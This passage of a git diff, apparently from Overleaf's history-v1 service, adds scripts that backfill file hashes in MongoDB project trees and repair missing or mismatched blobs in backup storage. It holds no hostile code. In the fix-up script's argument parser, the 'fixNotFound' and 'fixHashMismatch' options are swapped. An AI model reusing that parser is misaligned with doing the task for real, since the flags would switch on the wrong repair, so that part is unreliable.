+ +/** + * @param {QueueEntry} entry + * @return {Promise<boolean>} + */ +async function tryUpdateFileRefInMongoInDeletedProject(entry) { + STATS.mongoUpdates++ + const result = await deletedProjectsCollection.updateOne( + { + 'deleterData.deletedProjectId': entry.ctx.projectId, + [`${entry.path}._id`]: new ObjectId(entry.fileId), + }, + { + $set: { [`${entry.path}.hash`]: entry.hash }, + } + ) + return result.matchedCount === 1 +} + +const RETRY_UPDATE_HASH = 100 + +/** + * @param {QueueEntry} entry + * @return {Promise<void>} + */ +async function updateFileRefInMongo(entry) { + if (await tryUpdateFileRefInMongo(entry)) return + + const { fileId } = entry + const { projectId } = entry.ctx + for (let i = 0; i < RETRY_UPDATE_HASH; i++) { + let prefix = 'rootFolder.0' + let p = await projectsCollection.findOne( + { _id: projectId }, + { projection: { rootFolder: 1 } } + ) + if (!p) { + STATS.projectDeleted++ + prefix = 'project.rootFolder.0' + const deletedProject = await deletedProjectsCollection.findOne( + { + 'deleterData.deletedProjectId': projectId, + project: { $exists: true }, + }, + { projection: { 'project.rootFolder': 1 } } + ) + p = deletedProject?.project + if (!p) { + STATS.projectHardDeleted++ + console.warn( + 'bug: project hard-deleted while processing', + projectId, + fileId + ) + return + } + } + let found = false + for (const e of findFiles(entry.ctx, p.rootFolder[0], prefix)) { + found = e.fileId === fileId + if (!found) continue + if (await tryUpdateFileRefInMongo(e)) return + break + } + if (!found) { + if (await tryUpdateDeletedFileRefInMongo(entry)) return + STATS.fileHardDeleted++ + console.warn('bug: file hard-deleted while processing', projectId, fileId) + return + } + + STATS.fileTreeUpdated++ + } + throw new OError( + 'file-tree updated repeatedly while trying to add hash', + entry + ) +} + +/** + * @param {ProjectContext} ctx + * @param {Folder} folder + * @param {string} path + * @param {boolean} isInputLoop + * @return Generator<QueueEntry> + */ +function* findFiles(ctx, folder, path, isInputLoop = false) { + if (!folder || typeof folder !== 'object') { + ctx.fileTreeBroken = true + logger.warn({ projectId: ctx.projectId, path }, 'bad file-tree, bad folder') + return + } + if (!Array.isArray(folder.folders)) { + folder.folders = [] + ctx.fileTreeBroken = true + logger.warn( + { projectId: ctx.projectId, path: `${path}.folders` }, + 'bad file-tree, bad folders' + ) + } + let i = 0 + for (const child of folder.folders) { + const idx = i++ + yield* findFiles(ctx, child, `${path}.folders.${idx}`, isInputLoop) + } + if (!Array.isArray(folder.fileRefs)) { + folder.fileRefs = [] + ctx.fileTreeBroken = true + logger.warn( + { projectId: ctx.projectId, path: `${path}.fileRefs` }, + 'bad file-tree, bad fileRefs' + ) + } + i = 0 + for (const fileRef of folder.fileRefs) { + const idx = i++ + const fileRefPath = `${path}.fileRefs.${idx}` + if (!fileRef._id || !(fileRef._id instanceof ObjectId)) { + ctx.fileTreeBroken = true + logger.warn( + { projectId: ctx.projectId, path: fileRefPath }, + 'bad file-tree, bad fileRef id' + ) + continue + } + const fileId = fileRef._id.toString() + if (PROCESS_HASHED_FILES && fileRef.hash) { + if (ctx.canSkipProcessingHashedFile(fileRef.hash)) continue + if (isInputLoop) { + ctx.remainingQueueEntries++ + STATS.filesWithHash++ + } + yield { + ctx, + cacheKey: fileRef.hash, + fileId, + path: MONGO_PATH_SKIP_WRITE_HASH_TO_FILE_TREE, + hash: fileRef.hash, + } + } + if (!fileRef.hash) { + if (isInputLoop) { + ctx.remainingQueueEntries++ + STATS.filesWithoutHash++ + } + yield { + ctx, + cacheKey: fileId, + fileId, + path: fileRefPath, + } + } + } +} + +/** + * @param {Array<Project>} projects + * @param {string} prefix + * @param {Map<string,Array<DeletedFileRef>>} deletedFiles + * @param {Map<string,Array<Blob>>} blobs + * @param {Map<string,Array<string>>} backedUpBlobs + * @return Generator<QueueEntry> + */ +function* findFileInBatch( + projects, + prefix, + deletedFiles, + blobs, + backedUpBlobs +) { + for (const project of projects) { + const projectIdS = project._id.toString() + const historyIdS = project.overleaf.history.id.toString() + const projectBlobs = blobs.get(historyIdS) || [] + const projectBackedUpBlobs = new Set(backedUpBlobs.get(projectIdS) || []) + const projectDeletedFiles = deletedFiles.get(projectIdS) || [] + const ctx = new ProjectContext( + project._id, + historyIdS, + projectBlobs, + projectBackedUpBlobs + ) + for (const fileRef of projectDeletedFiles) { + const fileId = fileRef._id.toString() + if (fileRef.hash) { + if (ctx.canSkipProcessingHashedFile(fileRef.hash)) continue + ctx.remainingQueueEntries++ + STATS.filesWithHash++ + yield { + ctx, + cacheKey: fileRef.hash, + fileId, + hash: fileRef.hash, + path: MONGO_PATH_SKIP_WRITE_HASH_TO_FILE_TREE, + } + } else { + ctx.remainingQueueEntries++ + STATS.filesWithoutHash++ + yield { ctx, cacheKey: fileId, fileId, path: MONGO_PATH_DELETED_FILE } + } + } + for (const blob of projectBlobs) { + if (projectBackedUpBlobs.has(blob.getHash())) continue + ctx.remainingQueueEntries++ + yield { + ctx, + cacheKey: blob.getHash(), + path: MONGO_PATH_SKIP_WRITE_HASH_TO_FILE_TREE, + blob, + hash: blob.getHash(), + } + } + try { + yield* findFiles(ctx, project.rootFolder?.[0], prefix, true) + } catch (err) { + logger.error( + { err, projectId: projectIdS }, + 'bad file-tree, processing error' + ) + } finally { + if (ctx.fileTreeBroken) STATS.badFileTrees++ + } + } +} + +/** + * @param {Array<Project>} batch + * @return {Promise<{nBlobs: number, blobs: Map<string, Array<Blob>>}>} + */ +async function collectProjectBlobs(batch) { + if (!PROCESS_BLOBS) return { nBlobs: 0, blobs: new Map() } + return await getProjectBlobsBatch(batch.map(p => p.overleaf.history.id)) +} + +/** + * @param {Array<Project>} projects + * @return {Promise<Map<string, Array<DeletedFileRef>>>} + */ +async function collectDeletedFiles(projects) { + const deletedFiles = new Map() + if (!PROCESS_DELETED_FILES) return deletedFiles + + const cursor = deletedFilesCollection.find( + { + projectId: { $in: projects.map(p => p._id) }, + ...(PROCESS_HASHED_FILES + ? {} + : { + hash: { $exists: false }, + }), + }, + { + projection: { _id: 1, projectId: 1, hash: 1 }, + readPreference: READ_PREFERENCE_SECONDARY, + sort: { projectId: 1 }, + } + ) + for await (const deletedFileRef of cursor) { + const projectId = deletedFileRef.projectId.toString() + const found = deletedFiles.get(projectId) + if (found) { + found.push(deletedFileRef) + } else { + deletedFiles.set(projectId, [deletedFileRef]) + } + } + return deletedFiles +} + +/** + * @param {Array<Project>} projects + * @return {Promise<{nBackedUpBlobs:number,backedUpBlobs:Map<string,Array<string>>}>} + */ +async function collectBackedUpBlobs(projects) { + let nBackedUpBlobs = 0 + const backedUpBlobs = new Map() + if (!COLLECT_BACKED_UP_BLOBS) return { nBackedUpBlobs, backedUpBlobs } + + const cursor = backedUpBlobsCollection.find( + { _id: { $in: projects.map(p => p._id) } }, + { + readPreference: READ_PREFERENCE_SECONDARY, + sort: { _id: 1 }, + } + ) + for await (const record of cursor) { + const blobs = record.blobs.map(b => b.toString('hex')) + backedUpBlobs.set(record._id.toString(), blobs) + nBackedUpBlobs += blobs.length + } + return { nBackedUpBlobs, backedUpBlobs } +} + +const BATCH_HASH_WRITES = 1_000 +const BATCH_FILE_UPDATES = 100 + +const MONGO_PATH_DELETED_FILE = 'deleted-file' +const MONGO_PATH_SKIP_WRITE_HASH_TO_FILE_TREE = 'skip-write-to-file-tree' + +class ProjectContext { + /** @type {Promise<CachedPerProjectEncryptedS3Persistor> | null} */ + #cachedPersistorPromise = null + + /** @type {Set<string>} */ + #backedUpBlobs + + /** @type {Map<string, Blob>} */ + #historyBlobs + + /** @type {number} */ + remainingQueueEntries = 0 + + /** @type {boolean} */ + fileTreeBroken = false + + /** + * @param {ObjectId} projectId + * @param {string} historyId + * @param {Array<Blob>} blobs + * @param {Set<string>} backedUpBlobs + */ + constructor(projectId, historyId, blobs, backedUpBlobs) { + this.projectId = projectId + this.historyId = historyId + this.#backedUpBlobs = backedUpBlobs + this.#historyBlobs = new Map(blobs.map(b => [b.getHash(), b])) + } + + /** + * @param {string} hash + * @return {Blob | undefined} + */ + getCachedHistoryBlob(hash) { + return this.#historyBlobs.get(hash) + } + + /** + * @param {Blob} blob + */ + recordHistoryBlob(blob) { + this.#historyBlobs.set(blob.getHash(), blob) + } + + /** + * @param {string} hash + * @return {boolean} + */ + canSkipProcessingHashedFile(hash) { + if (this.#historyBlobs.has(hash)) return true // This file will be processed as blob. + if (GLOBAL_BLOBS.has(hash)) return true // global blob + return false + } + + /** + * @param {string} key + * @return {Promise<CachedPerProjectEncryptedS3Persistor>} + */ + getCachedPersistor(key) { + if (!this.#cachedPersistorPromise) { + // Fetch DEK once, but only if needed -- upon the first use + this.#cachedPersistorPromise = this.#getCachedPersistorWithRetries(key) + } + return this.#cachedPersistorPromise + } + + /** + * @param {string} key + * @return {Promise<CachedPerProjectEncryptedS3Persistor>} + */ + async #getCachedPersistorWithRetries(key) { + // Optimization: Skip GET on DEK in case no blobs are marked as backed up yet. + let tryGenerateDEKFirst = this.#backedUpBlobs.size === 0 + for (let attempt = 0; attempt < RETRIES; attempt++) { + try { + if (tryGenerateDEKFirst) { + try { + return await backupPersistor.generateDataEncryptionKey( + projectBlobsBucket, + key + ) + } catch (err) { + if (err instanceof AlreadyWrittenError) { + tryGenerateDEKFirst = false + // fall back to GET below + } else { + throw err + } + } + } + return await backupPersistor.forProject(projectBlobsBucket, key) + } catch (err) { + if (gracefulShutdownInitiated) throw err + if (err instanceof NoKEKMatchedError) { + throw err + } else { + logger.warn( + { err, projectId: this.projectId, attempt }, + 'failed to get DEK, trying again' + ) + const jitter = Math.random() * RETRY_DELAY_MS + await setTimeout(RETRY_DELAY_MS + jitter) + } + } + } + return await backupPersistor.forProject(projectBlobsBucket, key) + } + + async flushMongoQueuesIfNeeded() { + if (this.remainingQueueEntries === 0) { + await this.flushMongoQueues() + } + + if (this.#completedBlobs.size > BATCH_HASH_WRITES) { + await this.#storeBackedUpBlobs() + } + if (this.#pendingFileWrites.length > BATCH_FILE_UPDATES) { + await this.#storeFileHashes() + } + } + + async flushMongoQueues() { + await this.#storeBackedUpBlobs() + await this.#storeFileHashes() + } + + /** @type {Set<string>} */ + #pendingBlobs = new Set() + /** @type {Set<string>} */ + #completedBlobs = new Set() + + async #storeBackedUpBlobs() { + if (this.#completedBlobs.size === 0) return + const blobs = Array.from(this.#completedBlobs).map( + hash => new Binary(Buffer.from(hash, 'hex')) + ) + this.#completedBlobs.clear() + STATS.mongoUpdates++ + await backedUpBlobsCollection.updateOne( + { _id: this.projectId }, + { $addToSet: { blobs: { $each: blobs } } }, + { upsert: true } + ) + } + + /** + * @param {string} hash + */ + recordPendingBlob(hash) { + this.#pendingBlobs.add(hash) + } + + /** + * @param {string} hash + */ + recordFailedBlob(hash) { + this.#pendingBlobs.delete(hash) + } + + /** + * @param {string} hash + */ + recordBackedUpBlob(hash) { + this.#backedUpBlobs.add(hash) + this.#completedBlobs.add(hash) + this.#pendingBlobs.delete(hash) + } + + /** + * @param {string} hash + * @return {boolean} + */ + hasBackedUpBlob(hash) { + return ( + this.#pendingBlobs.has(hash) || + this.#completedBlobs.has(hash) || + this.#backedUpBlobs.has(hash) + ) + } + + /** @type {Array<QueueEntry>} */ + #pendingFileWrites = [] + + /** + * @param {QueueEntry} entry + */ + queueFileForWritingHash(entry) { + if (entry.path === MONGO_PATH_SKIP_WRITE_HASH_TO_FILE_TREE) return + this.#pendingFileWrites.push(entry) + } + + /** + * @param {Collection} collection + * @param {Array<QueueEntry>} entries + * @param {Object} query + * @return {Promise<Array<QueueEntry>>} + */ + async #tryBatchHashWrites(collection, entries, query) { + if (entries.length === 0) return [] + const update = {} + for (const entry of entries) { + query[`${entry.path}._id`] = new ObjectId(entry.fileId) + update[`${entry.path}.hash`] = entry.hash + } + STATS.mongoUpdates++ + const result = await collection.updateOne(query, { $set: update }) + if (result.matchedCount === 1) { + return [] // all updated + } + return entries + } + + async #storeFileHashes() { + if (this.#pendingFileWrites.length === 0) return + const individualUpdates = [] + const projectEntries = [] + const deletedProjectEntries = [] + for (const entry of this.#pendingFileWrites) { + if (entry.path === MONGO_PATH_DELETED_FILE) { + individualUpdates.push(entry) + } else if (entry.path.startsWith('project.')) { + deletedProjectEntries.push(entry) + } else { + projectEntries.push(entry) + } + } + this.#pendingFileWrites.length = 0 + + // Try to process them together, otherwise fallback to individual updates and retries. + individualUpdates.push( + ...(await this.#tryBatchHashWrites(projectsCollection, projectEntries, { + _id: this.projectId, + })) + ) + individualUpdates.push( + ...(await this.#tryBatchHashWrites( + deletedProjectsCollection, + deletedProjectEntries, + { 'deleterData.deletedProjectId': this.projectId } + )) + ) + for (const entry of individualUpdates) { + await updateFileRefInMongo(entry) + } + } + + /** @type {Map<string, Promise<string>>} */ + #pendingFiles = new Map() + + /** + * @param {QueueEntry} entry + */ + async processFile(entry) { + if (this.#pendingFiles.has(entry.cacheKey)) { + STATS.filesDuplicated++ + } else { + this.#pendingFiles.set(entry.cacheKey, processFileWithCleanup(entry)) + } + try { + entry.hash = await this.#pendingFiles.get(entry.cacheKey) + } finally { + this.remainingQueueEntries-- + } + this.queueFileForWritingHash(entry) + await this.flushMongoQueuesIfNeeded() + } +} + +/** + * @param {Blob} blob + * @return {number} + */ +function estimateBlobSize(blob) { + let size = blob.getByteLength() + if (blob.getStringLength()) { + // approximation for gzip (25 bytes gzip overhead and 20% compression ratio) + size = 25 + Math.ceil(size * 0.2) + } + return size +} + +async function processProjectsFromFile() { + const rl = readline.createInterface({ + input: fs.createReadStream(PROJECT_IDS_FROM), + }) + for await (const projectId of rl) { + if (!projectId) continue // skip over trailing new line + let project = await typedProjectsCollection.findOne( + { _id: new ObjectId(projectId) }, + { projection: { rootFolder: 1, _id: 1, 'overleaf.history.id': 1 } } + ) + let prefix = 'rootFolder.0' + if (!project) { + const deletedProject = await typedDeletedProjectsCollection.findOne( + { 'deleterData.deletedProjectId': new ObjectId(projectId) }, + { + projection: { + 'project.rootFolder': 1, + 'project._id': 1, + 'project.overleaf.history.id': 1, + }, + } + ) + if (!deletedProject?.project) { + logger.warn({ projectId }, 'project hard-deleted') + continue + } + project = deletedProject.project + prefix = 'project.rootFolder.0' + } + if (!project?.overleaf?.history?.id) { + logger.warn({ projectId }, 'project has no history id') + continue + } + try { + await queueNextBatch([project], prefix) + } catch (err) { + gracefulShutdownInitiated = true + await waitForDeferredQueues() + throw err + } + } + await waitForDeferredQueues() + console.warn('Done updating projects from input file') +} + +async function processNonDeletedProjects() { + try { + await batchedUpdate( + projectsCollection, + { 'overleaf.history.id': { $exists: true } }, + queueNextBatch, + { rootFolder: 1, _id: 1, 'overleaf.history.id': 1 }, + {}, + { + BATCH_RANGE_START, + BATCH_RANGE_END, + } + ) + } catch (err) { + gracefulShutdownInitiated = true + throw err + } finally { + await waitForDeferredQueues() + } + console.warn('Done updating live projects') +} + +async function processDeletedProjects() { + try { + await batchedUpdate( + deletedProjectsCollection, + { + 'deleterData.deletedProjectId': { + $gt: new ObjectId(BATCH_RANGE_START), + $lte: new ObjectId(BATCH_RANGE_END), + }, + 'project.overleaf.history.id': { $exists: true }, + }, + handleDeletedFileTreeBatch, + { + 'project.rootFolder': 1, + 'project._id': 1, + 'project.overleaf.history.id': 1, + } + ) + } catch (err) { + gracefulShutdownInitiated = true + throw err + } finally { + await waitForDeferredQueues() + } + console.warn('Done updating deleted projects') +} + +async function main() { + await loadGlobalBlobs() + if (PROJECT_IDS_FROM) { + await processProjectsFromFile() + } else { + if (PROCESS_NON_DELETED_PROJECTS) { + await processNonDeletedProjects() + } + if (PROCESS_DELETED_PROJECTS) { + await processDeletedProjects() + } + } + console.warn('Done.') +} + +try { + try { + await main() + } finally { + printStats(true) + try { + // Perform non-recursive removal of the BUFFER_DIR. Individual files + // should get removed in parallel as part of batch processing. + await fs.promises.rmdir(BUFFER_DIR) + } catch (err) { + console.error(`cleanup of BUFFER_DIR=${BUFFER_DIR} failed`, err) + } + } + + let code = 0 + if (STATS.filesFailed > 0) { + console.warn('Some files could not be processed, see logs and try again') + code++ + } + if (STATS.fileHardDeleted > 0) { + console.warn( + 'Some hashes could not be updated as the files were hard-deleted, this should not happen' + ) + code++ + } + if (STATS.projectHardDeleted > 0) { + console.warn( + 'Some hashes could not be updated as the project was hard-deleted, this should not happen' + ) + code++ + } + await setTimeout(SLEEP_BEFORE_EXIT) + process.exit(code) +} catch (err) { + console.error(err) + await setTimeout(SLEEP_BEFORE_EXIT) + process.exit(1) +} diff --git a/services/history-v1/storage/scripts/back_fill_file_hash_fix_up.mjs b/services/history-v1/storage/scripts/back_fill_file_hash_fix_up.mjs new file mode 100644 index 0000000..7bab794 --- /dev/null +++ b/services/history-v1/storage/scripts/back_fill_file_hash_fix_up.mjs @@ -0,0 +1,647 @@ +// @ts-check +import Events from 'node:events' +import fs from 'node:fs' +import Stream from 'node:stream' +import { ObjectId } from 'mongodb' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import { Blob } from 'overleaf-editor-core' +import { + BlobStore, + getStringLengthOfFile, + GLOBAL_BLOBS, + makeBlobForFile, +} from '../lib/blob_store/index.js' +import { db } from '../lib/mongodb.js' +import commandLineArgs from 'command-line-args' +import readline from 'node:readline' +import { _blobIsBackedUp, backupBlob } from '../lib/backupBlob.mjs' +import { NotFoundError } from '@overleaf/object-persistor/src/Errors.js' +import filestorePersistor from '../lib/persistor.js' +import { setTimeout } from 'node:timers/promises' + +// Silence warning. +Events.setMaxListeners(20) + +// Enable caching for ObjectId.toString() +ObjectId.cacheHexString = true + +/** + * @typedef {import("mongodb").Collection} Collection + * @typedef {import("mongodb").Collection<Project>} ProjectsCollection + * @typedef {import("mongodb").Collection<{project: Project}>} DeletedProjectsCollection + */ + +/** + * @typedef {Object} FileRef + * @property {ObjectId} _id + * @property {string} hash + */ + +/** + * @typedef {Object} Folder + * @property {Array<Folder>} folders + * @property {Array<FileRef>} fileRefs + */ + +/** + * @typedef {Object} Project + * @property {ObjectId} _id + * @property {Array<Folder>} rootFolder + * @property {{history: {id: (number|string)}}} overleaf + */ + +/** + * @return {{FIX_NOT_FOUND: boolean, FIX_HASH_MISMATCH: boolean, FIX_DELETE_PERMISSION: boolean, FIX_MISSING_HASH: boolean, LOGS: string}} + */ +function parseArgs() { + const args = commandLineArgs([ + { name: 'fixNotFound', type: String, defaultValue: 'true' }, + { name: 'fixDeletePermission', type: String, defaultValue: 'true' }, + { name: 'fixHashMismatch', type: String, defaultValue: 'true' }, + { name: 'fixMissingHash', type: String, defaultValue: 'true' }, + { name: 'logs', type: String, defaultValue: '' }, + ]) + /** + * commandLineArgs cannot handle --foo=false, so go the long way + * @param {string} name + * @return {boolean} + */ + function boolVal(name) { + const v = args[name] + if (['true', 'false'].includes(v)) return v === 'true' + throw new Error(`expected "true" or "false" for boolean option ${name}`) + } + return { + FIX_HASH_MISMATCH: boolVal('fixNotFound'), + FIX_DELETE_PERMISSION: boolVal('fixDeletePermission'), + FIX_NOT_FOUND: boolVal('fixHashMismatch'), + FIX_MISSING_HASH: boolVal('fixMissingHash'), + LOGS: args.logs, + } +} + +const { + FIX_HASH_MISMATCH, + FIX_DELETE_PERMISSION, + FIX_NOT_FOUND, + FIX_MISSING_HASH, + LOGS, +} = parseArgs() +if (!LOGS) { + throw new Error('--logs parameter missing') +} +const BUFFER_DIR = fs.mkdtempSync( + process.env.BUFFER_DIR_PREFIX || '/tmp/back_fill_file_hash-' +) +const USER_FILES_BUCKET_NAME = process.env.USER_FILES_BUCKET_NAME || '' +if (!USER_FILES_BUCKET_NAME) { + throw new Error('env var USER_FILES_BUCKET_NAME is missing') +} +// https://nodejs.org/api/stream.html#streamgetdefaulthighwatermarkobjectmode +const STREAM_HIGH_WATER_MARK = parseInt( + process.env.STREAM_HIGH_WATER_MARK || (64 * 1024).toString(), + 10 +) +const SLEEP_BEFORE_EXIT = parseInt(process.env.SLEEP_BEFORE_EXIT || '1000', 10) + +/** @type {ProjectsCollection} */ +const projectsCollection = db.collection('projects') +/** @type {DeletedProjectsCollection} */ +const deletedProjectsCollection = db.collection('deletedProjects') + +let gracefulShutdownInitiated = false + +process.on('SIGINT', handleSignal) +process.on('SIGTERM', handleSignal) + +function handleSignal() { + gracefulShutdownInitiated = true + console.warn('graceful shutdown initiated, draining queue') +} + +class FileDeletedError extends OError {} + +/** @type {Map<string,{project: Project, projectSoftDeleted: boolean}>} */ +const PROJECT_CACHE = new Map() + +/** + * @param {string} projectId + * @return {Promise<{project: Project, projectSoftDeleted: boolean}>} + */ +async function getProject(projectId) { + const cached = PROJECT_CACHE.get(projectId) + if (cached) return cached + + let projectSoftDeleted + let project = await projectsCollection.findOne({ + _id: new ObjectId(projectId), + }) + if (project) { + projectSoftDeleted = false + } else { + const softDeleted = await deletedProjectsCollection.findOne({ + 'deleterData.deletedProjectId': new ObjectId(projectId), + project: { $exists: true }, + }) + if (!softDeleted) { + throw new OError('project hard-deleted') + } + project = softDeleted.project + projectSoftDeleted = true + } + PROJECT_CACHE.set(projectId, { projectSoftDeleted, project }) + return { projectSoftDeleted, project } +} + +/** + * @param {Folder} folder + * @param {string} fileId + * @return {{path: string, fileRef: FileRef, folder: Folder}|null} + */ +function getFileTreePath(folder, fileId) { + if (!folder) return null + let idx = 0 + if (Array.isArray(folder.fileRefs)) { + for (const fileRef of folder.fileRefs) { + if (fileRef?._id.toString() === fileId) { + return { + fileRef, + path: `.fileRefs.${idx}`, + folder, + } + } + idx++ + } + } + idx = 0 + if (Array.isArray(folder.folders)) { + for (const child of folder.folders) { + const match = getFileTreePath(child, fileId) + if (match) { + return { + fileRef: match.fileRef, + folder: match.folder, + path: `.folders.${idx}${match.path}`, + } + } + idx++ + } + } + return null +} + +/** + * @param {string} projectId + * @param {string} fileId + * @return {Promise<{fileRef: FileRef, folder: Folder, fullPath: string, query: Object, projectSoftDeleted: boolean}>} + */ +async function findFile(projectId, fileId) { + const { projectSoftDeleted, project } = await getProject(projectId) + const match = getFileTreePath(project.rootFolder[0], fileId) + if (!match) { + throw new FileDeletedError('file not found in file-tree', { + projectSoftDeleted, + }) + } + const { path, fileRef, folder } = match + let fullPath + let query + if (projectSoftDeleted) { + fullPath = `project.rootFolder.0${path}` + query = { + 'deleterData.deletedProjectId': new ObjectId(projectId), + [`${fullPath}._id`]: new ObjectId(fileId), + } + } else { + fullPath = `rootFolder.0${path}` + query = { + _id: new ObjectId(projectId), + [`${fullPath}._id`]: new ObjectId(fileId), + } + } + return { + projectSoftDeleted, + query, + fullPath, + fileRef, + folder, + } +} + +/** + * @param {string} line + * @return {Promise<boolean>} + */ +async function fixNotFound(line) { + const { projectId, fileId, bucketName } = JSON.parse(line) + if (bucketName !== USER_FILES_BUCKET_NAME) { + throw new OError('not found case for another bucket') + } + + const { projectSoftDeleted, query, fullPath, fileRef, folder } = + await findFile(projectId, fileId) + logger.info({ projectId, fileId, fileRef }, 'removing fileRef') + // Copied from _removeElementFromMongoArray (https://github.com/overleaf/internal/blob/11e09528c153de6b7766d18c3c90d94962190371/services/web/app/src/Features/Project/ProjectEntityMongoUpdateHandler.js) + const nonArrayPath = fullPath.slice(0, fullPath.lastIndexOf('.')) + let result + if (projectSoftDeleted) { + result = await deletedProjectsCollection.updateOne(query, { + $pull: { [nonArrayPath]: { _id: new ObjectId(fileId) } }, + $inc: { 'project.version': 1 }, + }) + } else { + result = await projectsCollection.updateOne(query, { + $pull: { [nonArrayPath]: { _id: new ObjectId(fileId) } }, + $inc: { version: 1 }, + }) + } + if (result.matchedCount !== 1) { + throw new OError('file-tree write did not match', { result }) + } + // Update the cache. The mongo-path of the next file will be off otherwise. + folder.fileRefs = folder.fileRefs.filter(f => !f._id.equals(fileId)) + return true +} + +/** + * @param {string} projectId + * @param {string} fileId + * @param {string} hash + * @return {Promise<void>} + */ +async function setHashInMongo(projectId, fileId, hash) { + const { projectSoftDeleted, query, fullPath, fileRef } = await findFile( + projectId, + fileId + ) + if (fileRef.hash === hash) return + logger.info({ projectId, fileId, fileRef, hash }, 'setting fileRef hash') + let result + if (projectSoftDeleted) { + result = await deletedProjectsCollection.updateOne(query, { + $set: { [`${fullPath}.hash`]: hash }, + $inc: { 'project.version': 1 }, + }) + } else { + result = await projectsCollection.updateOne(query, { + $set: { [`${fullPath}.hash`]: hash }, + $inc: { version: 1 }, + }) + } + if (result.matchedCount !== 1) { + throw new OError('file-tree write did not match', { result }) + } + fileRef.hash = hash // Update cache for completeness. +} + +/** + * @param {string} projectId + * @param {string} fileId + * @param {string} historyId + * @return {Promise<void>} + */ +async function importRestoredFilestoreFile(projectId, fileId, historyId) { + const filestoreKey = `${projectId}/${fileId}` + const path = `${BUFFER_DIR}/${projectId}_${fileId}` + try { + let s + try { + s = await filestorePersistor.getObjectStream( + USER_FILES_BUCKET_NAME, + filestoreKey + ) + } catch (err) { + if (err instanceof NotFoundError) { + throw new OError('missing blob, need to restore filestore file', { + filestoreKey, + }) + } + throw err + } + await Stream.promises.pipeline( + s, + fs.createWriteStream(path, { highWaterMark: STREAM_HIGH_WATER_MARK }) + ) + const blobStore = new BlobStore(historyId) + const blob = await blobStore.putFile(path) + await backupBlob(historyId, blob, path) + await setHashInMongo(projectId, fileId, blob.getHash()) + } finally { + await fs.promises.rm(path, { force: true }) + } +} + +/** + * @param {string} projectId + * @param {string} fileId + * @param {string} path + * @return {Promise<Blob>} + */ +async function bufferFilestoreFileToDisk(projectId, fileId, path) { + const filestoreKey = `${projectId}/${fileId}` + try { + await Stream.promises.pipeline( + await filestorePersistor.getObjectStream( + USER_FILES_BUCKET_NAME, + filestoreKey + ), + fs.createWriteStream(path, { highWaterMark: STREAM_HIGH_WATER_MARK }) + ) + const blob = await makeBlobForFile(path) + blob.setStringLength( + await getStringLengthOfFile(blob.getByteLength(), path) + ) + return blob + } catch (err) { + if (err instanceof NotFoundError) { + throw new OError('missing blob, need to restore filestore file', { + filestoreKey, + }) + } + throw err + } +} + +/** + * @param {string} projectId + * @param {string} fileId + * @return {Promise<string>} + */ +async function computeFilestoreFileHash(projectId, fileId) { + const path = `${BUFFER_DIR}/${projectId}_${fileId}` + try { + const blob = await bufferFilestoreFileToDisk(projectId, fileId, path) + return blob.getHash() + } finally { + await fs.promises.rm(path, { force: true }) + } +} + +/** + * @param {string} projectId + * @param {string} fileId + * @return {Promise<void>} + */ +async function uploadFilestoreFile(projectId, fileId) { + const path = `${BUFFER_DIR}/${projectId}_${fileId}` + try { + const blob = await bufferFilestoreFileToDisk(projectId, fileId, path) + const hash = blob.getHash() + try { + await ensureBlobExistsForFileAndUploadToAWS(projectId, fileId, hash) + } catch (err) { + if (!(err instanceof Blob.NotFoundError)) throw err + + const { project } = await getProject(projectId) + const historyId = project.overleaf.history.id.toString() + const blobStore = new BlobStore(historyId) + await blobStore.putBlob(path, blob) + await ensureBlobExistsForFileAndUploadToAWS(projectId, fileId, hash) + } + } finally { + await fs.promises.rm(path, { force: true }) + } +} + +/** + * @param {string} line + * @return {Promise<boolean>} + */ +async function fixHashMismatch(line) { + const { + projectId, + fileId, + hash: computedHash, + entry: { + hash: fileTreeHash, + ctx: { historyId }, + }, + } = JSON.parse(line) + const blobStore = new BlobStore(historyId) + if (await blobStore.getBlob(fileTreeHash)) { + throw new OError('found blob with computed filestore object hash') + } + if (!(await blobStore.getBlob(computedHash))) { + await importRestoredFilestoreFile(projectId, fileId, historyId) + return true + } + return await ensureBlobExistsForFileAndUploadToAWS( + projectId, + fileId, + computedHash + ) +} + +/** + * @param {string} projectId + * @param {string} fileId + * @param {string} hash + * @return {Promise<boolean>} + */ +async function hashAlreadyUpdatedInFileTree(projectId, fileId, hash) { + const { fileRef } = await findFile(projectId, fileId) + return fileRef.hash === hash +} + +/** + * @param {string} projectId + * @param {string} hash + * @return {Promise<boolean>} + */ +async function needsBackingUpToAWS(projectId, hash) { + if (GLOBAL_BLOBS.has(hash)) return false + return !(await _blobIsBackedUp(projectId, hash)) +} + +/** + * @param {string} projectId + * @param {string} fileId + * @param {string} hash + * @return {Promise<boolean>} + */ +async function ensureBlobExistsForFileAndUploadToAWS(projectId, fileId, hash) { + const { project } = await getProject(projectId) + const historyId = project.overleaf.history.id.toString() + const blobStore = new BlobStore(historyId) + if ( + (await hashAlreadyUpdatedInFileTree(projectId, fileId, hash)) && + (await blobStore.getBlob(hash)) && + !(await needsBackingUpToAWS(projectId, hash)) + ) { + return false // already processed + } + + const stream = await blobStore.getStream(hash) + const path = `${BUFFER_DIR}/${historyId}_${hash}` + try { + await Stream.promises.pipeline( + stream, + fs.createWriteStream(path, { + highWaterMark: STREAM_HIGH_WATER_MARK, + }) + ) + + const writtenBlob = await makeBlobForFile(path) + writtenBlob.setStringLength( + await getStringLengthOfFile(writtenBlob.getByteLength(), path) + ) + if (writtenBlob.getHash() !== hash) { + // Double check download, better safe than sorry. + throw new OError('blob corrupted', { writtenBlob }) + } + + let blob = await blobStore.getBlob(hash) + if (!blob) { + // Calling blobStore.putBlob would result in the same error again. + // HACK: Skip upload to GCS and finalize putBlob operation directly. + await blobStore.backend.insertBlob(historyId, writtenBlob) + } + await backupBlob(historyId, writtenBlob, path) + } finally { + await fs.promises.rm(path, { force: true }) + } + await setHashInMongo(projectId, fileId, hash) + return true +} + +/** + * @param {string} line + * @return {Promise<boolean>} + */ +async function fixDeletePermission(line) { + let { projectId, fileId, hash } = JSON.parse(line) + if (!hash) hash = await computeFilestoreFileHash(projectId, fileId) + return await ensureBlobExistsForFileAndUploadToAWS(projectId, fileId, hash) +} + +/** + * @param {string} line + * @return {Promise<boolean>} + */ +async function fixMissingHash(line) { + let { projectId, _id: fileId } = JSON.parse(line) + const { + fileRef: { hash }, + } = await findFile(projectId, fileId) + if (hash) { + // processed, double check + return await ensureBlobExistsForFileAndUploadToAWS(projectId, fileId, hash) + } + await uploadFilestoreFile(projectId, fileId) + return true +} + +const CASES = { + 